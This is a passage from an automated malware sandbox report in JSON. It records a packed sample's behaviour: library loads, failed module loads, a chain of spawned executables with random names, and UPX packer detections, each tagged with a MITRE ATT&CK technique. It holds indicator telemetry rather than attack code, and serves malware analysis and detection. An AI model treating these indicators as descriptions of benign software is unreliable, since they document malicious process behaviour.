\"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00001372)\n \"204084.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00001372)\n \"204084.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00001372)\n \"24640.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003880)\n \"24640.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003880)\n \"24640.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003880)\n \"24640.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003880)\n \"680284.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003520)\n \"680284.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003520)\n \"680284.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003520)\n \"680284.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003520)\n \"ptppdf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001924)\n \"ptppdf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001924)\n \"ptppdf.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001924)\n \"ptppdf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001924)\n \"rhnlvvj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000468)\n \"rhnlvvj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000468)\n \"rhnlvvj.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000468)\n \"rhnlvvj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000468)\n \"ltnlpd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003472)\n \"ltnlpd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003472)\n \"ltnlpd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003472)\n \"ltnlpd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003472)\n \"tjphthx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004088)\n \"tjphthx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004088)\n \"tjphthx.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004088)\n \"tjphthx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004088)\n \"rhpxblx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003344)\n \"rhpxblx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003344)\n \"rhpxblx.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003344)\n \"rhpxblx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003344)\n \"ftnpjx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001344)\n \"ftnpjx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001344)\n \"ftnpjx.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001344)\n \"ftnpjx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001344)\n \"rjlbb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003968)\n \"rjlbb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003968)\n \"rjlbb.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003968)\n \"rjlbb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003968)\n \"vfdlx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002680)\n \"vfdlx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002680)\n \"vfdlx.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002680)\n \"vfdlx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002680)\n \"tjbljn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002736)\n \"tjbljn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002736)\n \"tjbljn.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002736)\n \"tjbljn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002736)\n \"tfftdr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003792)\n \"tfftdr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003792)\n \"tfftdr.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003792)\n \"tfftdr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003792)\n \"8402600.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001348)\n \"8402600.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001348)\n \"8402600.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001348)\n \"8402600.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001348)\n \"0642260.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003852)\n \"0642260.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003852)\n \"0642260.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003852)\n \"0642260.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003852)\n \"60024.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001356)\n \"60024.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001356)\n \"60024.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001356)\n \"60024.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001356)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"1300140054f4a075@RPCRT4.dll\"\n \"15001600c03efe69@ADVAPI32.dll\"\n \"0e000f00703ffe69@ADVAPI32.dll\"\n \"0e000f00cc3ffe69@ADVAPI32.dll\"\n \"11001200b447fe69@ADVAPI32.dll\"\n \"110012004848fe69@ADVAPI32.dll\"\n \"120013008c48fe69@ADVAPI32.dll\"\n \"12001300e448fe69@ADVAPI32.dll\"\n \"14001500386efe69@ADVAPI32.dll\"\n \"14001500506efe69@ADVAPI32.dll\"\n \"14001500686efe69@ADVAPI32.dll\"\n \"17001800806efe69@ADVAPI32.dll\"\n \"0d000e00986efe69@ADVAPI32.dll\"\n \"11001200a86efe69@ADVAPI32.dll\"\n \"11001200bc6efe69@ADVAPI32.dll\"\n \"0f001000fc6ffe69@ADVAPI32.dll\"\n \"140015003c70fe69@ADVAPI32.dll\"\n \"140015005470fe69@ADVAPI32.dll\"\n \"0c000d009c70fe69@ADVAPI32.dll\"\n \"0c000d00ac70fe69@ADVAPI32.dll\"\n \"0e000f00bc70fe69@ADVAPI32.dll\"\n \"0e000f00cc70fe69@ADVAPI32.dll\"\n \"0b000c00dc70fe69@ADVAPI32.dll\"\n \"180019001473fe69@RPCRT4.dll\"\n \"130014004073fe69@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"80824.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"80824.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"466844.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"466844.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"82466.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"82466.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"nhftnd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"nhftnd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"hxtnlx.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"hxtnlx.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"xpvvjv.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"xpvvjv.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"pftnv.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"pftnv.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"xjhvjn.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"xjhvjn.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"nthpjvt.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"nthpjvt.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"jdjdt.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"jdjdt.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"00666.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"00666.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"lvnptpp.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"lvnptpp.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"vnbvdx.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"vnbvdx.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"rdflttb.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"rdflttb.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"rjffft.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"rjffft.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"4066668.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"4066668.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"48628.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"48628.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"dpdlf.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"dpdlf.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"dltbld.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"dltbld.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"24640.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"24640.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"680284.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"680284.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"ptppdf.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"ptppdf.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"rhnlvvj.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"rhnlvvj.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"ltnlpd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"ltnlpd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"tjphthx.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"tjphthx.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"rhpxblx.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"rhpxblx.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"ftnpjx.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"ftnpjx.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"rjlbb.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"rjlbb.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"vfdlx.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"vfdlx.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"tjbljn.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"tjbljn.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"tfftdr.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"tfftdr.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"8402600.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"8402600.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"0642260.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"0642260.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"60024.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"60024.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"80824.exe\" called \"CreateProcessA\" with parameter \"c:\\466844.exe\" - (UID: 00000000-00006128)\n \"82466.exe\" called \"CreateProcessA\" with parameter \"c:\\hvjtfdj.exe\" - (UID: 00000000-00004108)\n \"hthbft.exe\" called \"CreateProcessA\" with parameter \"c:\\hxtnlx.exe\" - (UID: 00000000-00004304)\n \"hxfhrx.exe\" called \"CreateProcessA\" with parameter \"c:\\00666.exe\" - (UID: 00000000-00002404)\n \"204084.exe\" called \"CreateProcessA\" with parameter \"c:\\24640.exe\" - (UID: 00000000-00001372)\n \"jvvxj.exe\" called \"CreateProcessA\" with parameter \"c:\\ptppdf.exe\" - (UID: 00000000-00000688)\n \"ftnpjx.exe\" called \"CreateProcessA\" with parameter \"c:\\rjlbb.exe\" - (UID: 00000000-00001344)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 752B0000\n \"80824.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 752B0000\n \"466844.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 752B0000\n \"420260.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 752B0000\n \"82466.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 752B0000\n \"hvjtfdj.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 752B0000\n \"nhftnd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 752B0000\n \"hthbft.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 752B0000\n \"hxtnlx.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 752B0000\n \"pfflf.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 752B0000\n \"xpvvjv.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 752B0000\n \"pftnv.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 752B0000\n \"ddvtj.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 752B0000\n \"xjhvjn.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 752B0000\n \"nthpjvt.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 752B0000\n \"jdjdt.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 752B0000\n \"hxfhrx.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 752B0000\n \"00666.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 752B0000\n \"6666266.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 752B0000\n \"04040.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 752B0000\n \"lvnptpp.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 752B0000\n \"vlvdf.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 752B0000\n \"vnbvdx.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 752B0000\n \"rdflttb.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 752B0000\n \"phxdv.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 752B0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"80824.exe\" (UID: 00000000-00006128)\n Spawned process \"466844.exe\" (UID: 00000000-00005872)\n Spawned process \"420260.exe\" (UID: 00000000-00005636)\n Spawned process \"82466.exe\" (UID: 00000000-00004108)\n Spawned process \"hvjtfdj.exe\" (UID: 00000000-00005976)\n Spawned process \"nhftnd.exe\" (UID: 00000000-00005988)\n Spawned process \"hthbft.exe\" (UID: 00000000-00004304)\n Spawned process \"hxtnlx.exe\" (UID: 00000000-00006000)\n Spawned process \"pfflf.exe\" (UID: 00000000-00002412)\n Spawned process \"xpvvjv.exe\" (UID: 00000000-00001208)\n Spawned process \"pftnv.exe\" (UID: 00000000-00004232)\n Spawned process \"ddvtj.exe\" (UID: 00000000-00006072)\n Spawned process \"xjhvjn.exe\" (UID: 00000000-00004184)\n Spawned process \"nthpjvt.exe\" (UID: 00000000-00004372)\n Spawned process \"jdjdt.exe\" (UID: 00000000-00004388)\n Spawned process \"hxfhrx.exe\" (UID: 00000000-00002404)\n Spawned process \"00666.exe\" (UID: 00000000-00002912)\n Spawned process \"6666266.exe\" (UID: 00000000-00004252)\n Spawned process \"04040.exe\" (UID: 00000000-00001024)\n Spawned process \"lvnptpp.exe\" (UID: 00000000-00000580)\n Spawned process \"vlvdf.exe\" (UID: 00000000-00004420)\n Spawned process \"vnbvdx.exe\" (UID: 00000000-00003712)\n Spawned process \"rdflttb.exe\" (UID: 00000000-00003212)\n Spawned process \"phxdv.exe\" (UID: 00000000-00003308)\n Spawned process \"hfbbnn.exe\" (UID: 00000000-00003252)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"80824.exe\" (UID: 00000000-00006128)\n Spawned process \"466844.exe\" (UID: 00000000-00005872)\n Spawned process \"420260.exe\" (UID: 00000000-00005636)\n Spawned process \"82466.exe\" (UID: 00000000-00004108)\n Spawned process \"hvjtfdj.exe\" (UID: 00000000-00005976)\n Spawned process \"nhftnd.exe\" (UID: 00000000-00005988)\n Spawned process \"hthbft.exe\" (UID: 00000000-00004304)\n Spawned process \"hxtnlx.exe\" (UID: 00000000-00006000)\n Spawned process \"pfflf.exe\" (UID: 00000000-00002412)\n Spawned process \"xpvvjv.exe\" (UID: 00000000-00001208)\n Spawned process \"pftnv.exe\" (UID: 00000000-00004232)\n Spawned process \"ddvtj.exe\" (UID: 00000000-00006072)\n Spawned process \"xjhvjn.exe\" (UID: 00000000-00004184)\n Spawned process \"nthpjvt.exe\" (UID: 00000000-00004372)\n Spawned process \"jdjdt.exe\" (UID: 00000000-00004388)\n Spawned process \"hxfhrx.exe\" (UID: 00000000-00002404)\n Spawned process \"00666.exe\" (UID: 00000000-00002912)\n Spawned process \"6666266.exe\" (UID: 00000000-00004252)\n Spawned process \"04040.exe\" (UID: 00000000-00001024)\n Spawned process \"lvnptpp.exe\" (UID: 00000000-00000580)\n Spawned process \"vlvdf.exe\" (UID: 00000000-00004420)\n Spawned process \"vnbvdx.exe\" (UID: 00000000-00003712)\n Spawned process \"rdflttb.exe\" (UID: 00000000-00003212)\n Spawned process \"phxdv.exe\" (UID: 00000000-00003308)\n Spawned process \"hfbbnn.exe\" (UID: 00000000-00003252)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9\" was detected as \"UPX\" and name: \"Packer\"\n \"088822.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"xvndjvv.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"60884.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"ldrttb.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"rfhlpxb.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"8668622.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"68646.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"6844880.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"ljvbrr.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"rxvjbx.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"frbnhn.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"dthhtb.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"hxpnnf.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"rtdhhn.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"rjtxj.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"60024.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"0642260.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"8402600.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"tfftdr.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"tjbljn.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"xdnld.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"vfdlx.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"rjlbb.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"ftnpjx.exe\" was detected as \"UPX\" and name: \"Packer\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9\" has an executable section named \"UPX0\"\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9\" has an executable section named \"UPX1\"\n \"088822.exe\" has an executable section named \"UPX0\"\n \"088822.exe\" has an executable section named \"UPX1\"\n \"xvndjvv.exe\" has an executable section named \"UPX0\"\n \"xvndjvv.exe\" has an executable section named \"UPX1\"\n \"60884.exe\" has an executable section named \"UPX0\"\n \"60884.exe\" has an executable section named \"UPX1\"\n \"ldrttb.exe\" has an executable section named \"UPX0\"\n \"ldrttb.exe\" has an executable section named \"UPX1\"\n \"rfhlpxb.exe\" has an executable section named \"UPX0\"\n \"rfhlpxb.exe\" has an executable section named \"UPX1\"\n \"8668622.exe\" has an executable section named \"UPX0\"\n \"8668622.exe\" has an executable section named \"UPX1\"\n \"68646.exe\" has an executable section named \"UPX0\"\n \"68646.exe\" has an executable section named \"UPX1\"\n \"6844880.exe\" has an executable section named \"UPX0\"\n \"6844880.exe\" has an executable section named \"UPX1\"\n \"ljvbrr.exe\" has an executable section named \"UPX0\"\n \"ljvbrr.exe\" has an executable section named \"UPX1\"\n \"rxvjbx.exe\" has an executable section named \"UPX0\"\n \"rxvjbx.exe\" has an executable section named \"UPX1\"\n \"frbnhn.exe\" has an executable section named \"UPX0\"\n \"frbnhn.exe\" has an executable section named \"UPX1\"\n \"dthhtb.exe\" has an executable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9\" has an writable section named \"UPX0\"\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9\" has an writable section named \"UPX1\"\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9\" has an writable section named \"UPX2\"\n \"088822.exe\" has an writable section named \"UPX0\"\n \"088822.exe\" has an writable section named \"UPX1\"\n \"088822.exe\" has an writable section named \"UPX2\"\n \"xvndjvv.exe\" has an writable section named \"UPX0\"\n \"xvndjvv.exe\" has an writable section named \"UPX1\"\n \"xvndjvv.exe\" has an writable section named \"UPX2\"\n \"60884.exe\" has an writable section named \"UPX0\"\n \"60884.exe\" has an writable section named \"UPX1\"\n \"60884.exe\" has an writable section named \"UPX2\"\n \"ldrttb.exe\" has an writable section named \"UPX0\"\n \"ldrttb.exe\" has an writable section named \"UPX1\"\n \"ldrttb.exe\" has an writable section named \"UPX2\"\n \"rfhlpxb.exe\" has an writable section named \"UPX0\"\n \"rfhlpxb.exe\" has an writable section named \"UPX1\"\n \"rfhlpxb.exe\" has an writable section named \"UPX2\"\n \"8668622.exe\" has an writable section named \"UPX0\"\n \"8668622.exe\" has an 